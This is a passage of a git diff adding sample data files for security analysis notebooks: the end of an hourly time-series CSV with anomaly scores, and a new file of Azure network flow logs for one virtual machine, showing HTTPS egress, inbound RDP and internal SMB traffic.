+"2019-06-04T02:00:00Z",722223752,737071879,0,0
+"2019-06-04T03:00:00Z",758772577,800417782,0,0
+"2019-06-04T04:00:00Z",706415711,774944439,0,0
+"2019-06-04T05:00:00Z",994897470,967874200,0,0
+"2019-06-04T06:00:00Z",974844971,952721343,0,0
+"2019-06-04T07:00:00Z",916462999,995334142,"-0.1399862903897513",0
+"2019-06-04T08:00:00Z",965722723,969504644,0,0
+"2019-06-04T09:00:00Z",913345256,1019660202,"-0.6468923621229482",0
+"2019-06-04T10:00:00Z",900491348,966087784,0,0
+"2019-06-04T11:00:00Z",917100812,1023739866,"-0.6528788747297558",0
+"2019-06-04T12:00:00Z",905215807,1041282256,"-1.1964232692924484",0
+"2019-06-04T13:00:00Z",910648863,972419780,0,0
+"2019-06-04T14:00:00Z",1008418310,949954433,0,0
+"2019-06-04T15:00:00Z",900965862,964056056,0,0
+"2019-06-04T16:00:00Z",870174355,926850185,0,0
+"2019-06-04T17:00:00Z",876299048,983605397,"-0.6652042784024995",0
+"2019-06-04T18:00:00Z",878786944,908723178,0,0
+"2019-06-04T19:00:00Z",874525847,968887665,"-0.4261098067250901",0
+"2019-06-04T20:00:00Z",953351422,949381935,0,0
+"2019-06-04T21:00:00Z",961309357,958374300,0,0
+"2019-06-04T22:00:00Z",910212834,918149816,0,0
+"2019-06-04T23:00:00Z",913189663,1008665668,"-0.44668960257728857",0
+"2019-06-05T00:00:00Z",946670363,992622588,0,0
+"2019-06-05T01:00:00Z",754488773,797248567,0,0
+"2019-06-05T02:00:00Z",762510726,782794286,0,0
+"2019-06-05T03:00:00Z",746115005,835533200,"-0.3347976576208987",0
+"2019-06-05T04:00:00Z",744582340,844811673,"-0.5344868726589419",0
+"2019-06-05T05:00:00Z",1469756566,1542744332,"-0.03131623197123266",0
diff --git a/doc/data/alertlist.csv b/docs/notebooks/data/alertlist.csv
similarity index 100%
rename from doc/data/alertlist.csv
rename to docs/notebooks/data/alertlist.csv
diff --git a/docs/notebooks/data/az_net_flows.csv b/docs/notebooks/data/az_net_flows.csv
new file mode 100644
index 000000000..012c84cce
--- /dev/null
+++ b/docs/notebooks/data/az_net_flows.csv
@@ -0,0 +1,461 @@
+,TenantId,TimeGenerated,FlowStartTime,FlowEndTime,FlowIntervalEndTime,FlowType,ResourceGroup,VMName,VMIPAddress,PublicIPs,SrcIP,DestIP,L4Protocol,L7Protocol,DestPort,FlowDirection,AllowedOutFlows,AllowedInFlows,DeniedInFlows,DeniedOutFlows,RemoteRegion,VMRegion,AllExtIPs,TotalAllowedFlows
+881,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.697,2019-02-12 13:00:07.000,2019-02-12 13:45:08.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+877,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:00:48.000,2019-02-12 13:58:33.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+876,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:00:48.000,2019-02-12 13:58:33.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+879,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:10:56.000,2019-02-12 13:55:57.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+875,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:22:20.000,2019-02-12 13:22:20.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['104.43.212.12'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,104.43.212.12,1.0
+880,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:42:14.000,2019-02-12 13:42:14.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+878,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:46:48.000,2019-02-12 13:46:48.000,2019-02-12 14:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.107.4.50'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,13.107.4.50,1.0
+940,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.222,2019-02-12 14:00:08.000,2019-02-12 14:54:14.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+941,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.222,2019-02-12 14:00:08.000,2019-02-12 14:54:14.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+931,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.206,2019-02-12 14:02:46.000,2019-02-12 14:58:40.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+932,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.206,2019-02-12 14:02:46.000,2019-02-12 14:58:40.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+933,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.206,2019-02-12 14:10:57.000,2019-02-12 14:40:57.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+936,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.206,2019-02-12 14:28:42.000,2019-02-12 14:28:42.000,2019-02-12 15:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.15.99,1.0
+918,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.678,2019-02-12 15:00:09.000,2019-02-12 15:45:09.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+886,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:04:13.000,2019-02-12 15:58:41.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '40.85.232.64', '13.71.172.128']",,,T,https,443.0,O,24.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,24.0
+887,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:04:13.000,2019-02-12 15:58:41.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '40.85.232.64', '13.71.172.128']",,,T,https,443.0,O,24.0,0.0,0.0,0.0,canadacentral,eastus,40.85.232.64,24.0
+888,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:04:13.000,2019-02-12 15:58:41.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '40.85.232.64', '13.71.172.128']",,,T,https,443.0,O,24.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,24.0
+882,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:04:13.000,2019-02-12 15:43:21.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['104.43.212.12'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,centralus,eastus,104.43.212.12,4.0
+893,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:25:57.000,2019-02-12 15:40:57.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+894,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.678,2019-02-12 15:35:36.000,2019-02-12 15:52:13.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,6.0
+895,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.678,2019-02-12 15:35:36.000,2019-02-12 15:52:13.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus,eastus,23.96.64.84,6.0
+904,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.357,2019-02-12 16:00:10.000,2019-02-12 16:55:58.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+903,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.357,2019-02-12 16:00:10.000,2019-02-12 16:55:58.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+897,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:04:27.000,2019-02-12 16:55:20.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+896,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:04:27.000,2019-02-12 16:55:20.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+898,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:10:58.000,2019-02-12 16:10:58.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+900,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:18:15.000,2019-02-12 16:18:15.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+901,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:56:19.000,2019-02-12 16:56:51.000,2019-02-12 17:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['131.107.147.209'],,,T,ms-wbt-server,3389.0,I,0.0,2.0,0.0,0.0,,eastus,131.107.147.209,2.0
+905,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:00:06.000,2019-02-12 17:58:50.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+906,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:00:06.000,2019-02-12 17:58:50.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+915,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.853,2019-02-12 17:00:10.000,2019-02-12 17:46:40.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+914,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.853,2019-02-12 17:00:10.000,2019-02-12 17:46:40.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+912,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:09:35.000,2019-02-12 17:47:20.000,2019-02-12 18:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['131.107.147.209'],,,T,ms-wbt-server,3389.0,I,0.0,11.0,0.0,0.0,,eastus,131.107.147.209,11.0
+907,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:10:58.000,2019-02-12 17:42:01.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+917,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.853,2019-02-12 17:26:19.000,2019-02-12 17:44:09.000,2019-02-12 18:00:00.000,IntraVNet,,,,,10.0.3.4,10.0.3.5,T,microsoft-ds,445.0,I,0.0,6.0,0.0,0.0,,eastus,10.0.3.4,6.0
+916,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.853,2019-02-12 17:26:19.000,2019-02-12 17:44:09.000,2019-02-12 18:00:00.000,IntraVNet,,,,,10.0.3.4,10.0.3.5,T,microsoft-ds,445.0,O,6.0,0.0,0.0,0.0,,eastus,10.0.3.5,6.0
+911,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:29:15.000,2019-02-12 17:58:25.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.82.152.48', '20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus,eastus,23.96.64.84,8.0
+910,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:29:15.000,2019-02-12 17:58:25.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.82.152.48', '20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,8.0
+909,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:29:15.000,2019-02-12 17:58:25.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.82.152.48', '20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus,eastus,13.82.152.48,8.0
+871,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 19:23:52.321,2019-02-12 18:01:18.000,2019-02-12 18:46:19.000,2019-02-12 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+857,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 19:23:52.306,2019-02-12 18:04:04.000,2019-02-12 18:58:59.000,2019-02-12 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+858,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 19:23:52.306,2019-02-12 18:04:04.000,2019-02-12 18:58:59.000,2019-02-12 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+859,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 19:23:52.306,2019-02-12 18:27:16.000,2019-02-12 18:57:16.000,2019-02-12 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+861,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:00:10.000,2019-02-12 19:58:35.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+862,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:00:10.000,2019-02-12 19:58:35.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+865,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:00:55.000,2019-02-12 19:00:55.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+869,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:00:58.000,2019-02-12 19:46:20.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,3.0
+863,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:01:01.000,2019-02-12 19:01:01.000,2019-02-12 20:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['8.249.241.254'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,8.249.241.254,1.0
+864,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:12:16.000,2019-02-12 19:57:17.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+866,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:31:20.000,2019-02-12 19:31:20.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+868,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:56:09.000,2019-02-12 19:56:41.000,2019-02-12 20:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['131.107.147.209'],,,T,ms-wbt-server,3389.0,I,0.0,3.0,0.0,0.0,,eastus,131.107.147.209,3.0
+867,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:56:49.000,2019-02-12 19:56:49.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+950,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.779,2019-02-12 20:08:41.000,2019-02-12 20:57:28.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,17.0
+842,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.498,2019-02-12 20:08:41.000,2019-02-12 20:59:11.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,7.0
+843,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.498,2019-02-12 20:08:41.000,2019-02-12 20:59:11.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,7.0
+949,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.748,2019-02-12 20:08:41.000,2019-02-12 20:19:49.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.173.28.179', '13.67.143.117']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,3.0
+947,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.748,2019-02-12 20:08:41.000,2019-02-12 20:19:49.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.173.28.179', '13.67.143.117']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,3.0
+948,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.748,2019-02-12 20:08:41.000,2019-02-12 20:19:49.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.173.28.179', '13.67.143.117']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,52.173.28.179,3.0
+951,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.779,2019-02-12 20:08:41.000,2019-02-12 20:57:28.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,17.0
+964,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:26.967,2019-02-12 20:08:42.000,2019-02-12 20:55:39.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+961,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.342,2019-02-12 20:08:45.000,2019-02-12 20:08:45.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+925,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.607,2019-02-12 20:08:46.000,2019-02-12 20:58:33.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.52.108.92', '40.77.228.69', '13.68.93.109']",,,T,https,443.0,O,15.0,0.0,0.0,0.0,eastus2,eastus,13.68.93.109,15.0
+924,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.607,2019-02-12 20:08:46.000,2019-02-12 20:58:33.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.52.108.92', '40.77.228.69', '13.68.93.109']",,,T,https,443.0,O,15.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,15.0
+923,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.607,2019-02-12 20:08:46.000,2019-02-12 20:58:33.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.52.108.92', '40.77.228.69', '13.68.93.109']",,,T,https,443.0,O,15.0,0.0,0.0,0.0,eastus2,eastus,65.52.108.92,15.0
+922,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.607,2019-02-12 20:08:46.000,2019-02-12 20:58:33.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.52.108.92', '40.77.228.69', '13.68.93.109']",,,T,https,443.0,O,15.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,15.0
+837,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,23.48.36.78,41.0
+835,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,23.223.3.100,41.0
+834,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,205.185.216.42,41.0
+962,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:26.967,2019-02-12 20:08:47.000,2019-02-12 20:18:41.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.83.149.5', '13.83.148.235']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,westus,eastus,13.83.149.5,4.0
+963,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:26.967,2019-02-12 20:08:47.000,2019-02-12 20:18:41.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.83.149.5', '13.83.148.235']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,westus,eastus,13.83.148.235,4.0
